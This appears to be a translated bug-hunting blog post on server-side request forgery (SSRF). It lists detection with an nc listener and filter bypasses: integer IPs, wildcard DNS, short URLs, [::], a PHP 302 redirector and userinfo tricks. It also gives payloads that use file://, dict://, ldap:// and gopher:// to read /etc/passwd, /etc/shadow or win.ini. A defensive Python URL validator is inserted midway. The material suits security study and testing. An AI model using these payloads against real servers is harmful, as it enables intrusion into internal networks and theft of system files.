Notes on hunting SSRF vulnerabilities

  Recently I have read a lot about SSRF discovery techniques and tricks, and I have some earlier experience of my own hunting SSRF bugs. A short summary:

  My earlier notes:


SSRF = server-side request forgery: the server fetches a URL on the attacker's behalf -> intranet roaming / probing internal services / open-port detection / getshell / XSS / XXE

http://test.com/proxy?url=<your server address> -> if the request that reaches your server comes from an IP that is not your own, there is about an eighty percent chance SSRF is present:
the site fetched an external address, and the requesting IP was not the client's.

Internal address ranges:
192.168.0.0 - 192.168.255.255
172.16.0.1 - 172.31.255.255
10.0.0.0 - 10.255.255.255
Trusted domain: a fetch through http://baidu.com -> may land in the same internal ranges listed above.

http://baidu.com/proxy?url=http://<your server ip>

On our own server, listen with:
nc -lvvp <port>
1. Does a request arrive at all? -> tells whether the target makes outbound requests
2. What is the source IP? -> tells whether the request originates from the target server

What can SSRF do? Probe the intranet / roam the internal network.
http://baidu.com/proxy?url=http://127.0.0.1 // the "hello world" of a test environment
i.e. reaching the internal network from the outside.
Most SSRF lives in a url parameter.
URL redirects, share-link endpoints and page-to-text/print features may carry SSRF.
Parameters named url, xurl, loginUrl, urlxxx, xxxurl, xxx_url are the ones to test,
where xxx stands for any string (*).

SSRF bypasses

127.0.0.1 -> 127.0.1.1.xip.io (wildcard DNS)
127.0.0.1 -> integer IP -> http://2130706433
hexadecimal and octal IP forms
Reference: https://www.silisoftware.com/tools/ipconverter.php?convert_from=127.0.0.1
Reference for real-world SSRF reports:
https://shuimugan.com/?BugSearch%5Bbug_no%5D=&BugSearch%5Btitle%5D=ssrf&BugSearch%5Bvendor%5D=&BugSearch%5Bauthor%5D=&BugSearch%5Bbug_type%5D=&BugSearch%5Bbug_level_by_whitehat%5D=&BugSearch%5Bbug_level_by_vendor%5D=&BugSearch%5Brank_by_whitehat%5D=&BugSearch%5Bbug_date%5D=

Short-URL bypass
turn http://127.0.0.1 into a short URL with a shortener such as
https://www.ft12.com/
https://tb.am/
an encoded IP can be shortened a second time.
Other bypasses (IPv6 unspecified address):
http://[::]/

http://[::]:22/

http://[::]:25/

Bypass using a 302 redirect:

302.php (on a server you control):

<?php header("Location: ".$_GET['u']); ?>

http://***.com/302.php?u=http://[::]/

or any other internal address

About trusted domains:

If the target is http://test.com and the check only accepts *.test.com, what then?

One option:

set a hosts-file (DNS) entry so that a *.test.com name points at an internal IP:

<internal ip>  *.test.com

Then http://test.com/proxy?url=*.test.com -> passes the domain check and is resolved to the internal address automatically.

On 302 redirects:

The trusted-domain check is in place; how else can it be played?

If some host under *.test.com has an open redirect:

redirect URL: http://*.test.com/xxx.php?url=<internal ip>

use it with the SSRF:

http://test.com/proxy?url=http://*.test.com/xxx.php?url=<internal ip> (open redirect)

And how else?

What if there is no open redirect?

The old way:

a hosts-file entry mapping *.test.com to an internal IP:

<internal ip>  *.test.com

http://test.com/proxy?url=http://*.test.com/302.php?url=<internal ip> (redirect)

Another way past the trusted-domain check? Userinfo in the URL:

http://test.com/proxy?url=http://test.com@<internal ip>

And if that is blocked too? Perhaps http/https requests are disabled altogether.

You can also try the following protocols (URL schemes):

file:///
dict://
sftp://
ldap://
tftp://
gopher://
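As a defensive counterpart to the bypasses and schemes listed above, here is an added Python example (not from the original post) of an allowlist check for a url= fetch parameter: it refuses non-http(s) schemes, userinfo (test.com@ip), integer/hex/octal IP spellings, [::], wildcard-DNS names that resolve to loopback or RFC 1918 space, and unresolvable hosts, and it is meant to be re-run on every redirect hop. The resolver parameter is an assumption of this example so that a constructed lookup table can stand in for DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file:, dict:, gopher:, ldap:, ... are refused outright

def resolve_all(host):
    # Every address the host maps to. Literals map to themselves, including the decimal,
    # hex and octal IPv4 spellings (2130706433, 0x7f000001) that libc's inet_aton accepts.
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        pass
    try:
        return [socket.inet_ntoa(socket.inet_aton(host))]
    except OSError:
        pass
    try:
        return [info[4][0] for info in socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)]
    except socket.gaierror:
        return []

def is_internal(addr):
    # Loopback, RFC 1918, link-local, [::], multicast/reserved, and IPv4-mapped IPv6 forms of each.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)

def validate_fetch_url(url, resolver=resolve_all):
    # Returns (ok, reason). Apply it to the first URL and again to every redirect Location
    # the client would follow, so a 302 into the intranet fails like a direct request.
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"  # http://test.com@<internal ip>
    if not parts.hostname:
        return False, "missing host"
    addrs = resolver(parts.hostname)
    if not addrs:
        return False, "host does not resolve"  # fail closed, never fail open
    for addr in addrs:
        if is_internal(ipaddress.ip_address(addr)):
            return False, f"resolves to internal address {addr}"
    return True, "ok"

def validate_redirect_chain(urls, resolver=resolve_all):
    # Hop-by-hop check: disable automatic redirects and validate each Location before following.
    return all(validate_fetch_url(u, resolver)[0] for u in urls)
```

The check must run on the addresses the fetching client will actually connect to; validating a hostname and then letting the HTTP library resolve it again leaves a DNS rebinding gap.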

file is for file access, which is why SSRF is often said to lead to file read:

 file:///

file:// fetches a file from the local file system.

windows:
  http://test.com/proxy?url=file:///C:/Windows/win.ini
linux:
  http://test.com/proxy?url=file:///etc/passwd
  /etc/passwd may be filtered; try reading other paths such as /etc/shadow or /etc/hosts, or the usr and tmp directories (see the Linux directory layout).

dict:// -
The DICT URL scheme refers to definitions or word lists available through the DICT protocol:
Client, send the request: http://test.com/proxy?url=dict://<server address>:1337
Server: nc -lvp 1337
  check whether the request arrives

sftp:// -
SFTP stands for SSH File Transfer Protocol (Secure File Transfer Protocol), a file transfer protocol bundled with SSH that runs over an SSH secure connection.

tftp:// -
Trivial File Transfer Protocol is a simple lock-step file transfer protocol that lets a client get a file from, or put a file onto, a remote host.

Used the same way as dict://.

Special cases:

ldap:// or ldaps:// or ldapi:// -
LDAP stands for Lightweight Directory Access Protocol, an application protocol for accessing and maintaining distributed directory information services over an IP network.

http://test.com/proxy?url=ldaps://localhost:1337/%0astats%0aquit
http://test.com/proxy?url=ldap://localhost:1337/%0astats%0aquit
http://test.com/proxy?url=ldapi://localhost:1337/%0astats%0aquit

swap other ports in for 1337 to iterate through them

gopher:// -
Gopher is a distributed document delivery service. It lets users explore, search and retrieve information residing in different locations in a seamless fashion.

   http://test.com/proxy?url=http://<server address>/gophar.php

  gophar.php contents:

  Another server:

<?php
   header('Location: gopher://<other server>:1337/_Hi%0Assrf%0Atest');
?>

On the other server: nc -lvp 1337
  receives:
  Hi\nssrf\ntest
In practice, bug hunting is nowhere near as complicated as we imagine...

Some less obvious places to hunt SSRF, which I feel are rarely discussed:

  SSRF in file upload:

  Common spot:

In the file-upload request, parameters such as imagePath / Path let you set the image address yourself:

   Try changing it to http://<intranet ip>/favicon.ico (look up favicon.ico on Baidu if unfamiliar) and bulk-upload; a successful upload indicates SSRF!

File upload exploitation 2:

  A case I saw today:

  File upload inputs are usually type=file: <input type="file">

  If we change <input type="file"> to type="url", does it work like the case above? Bulk-upload http://<intranet ip>/favicon.ico and see whether any image uploads successfully, to test for SSRF:

  Case:

Switching from file upload to upload by URL:

That's all for now; writing it down for later reference. Bug hunting is basically not that complicated..


Source: www.cnblogs.com/piaomiaohongchen/p/11085388.html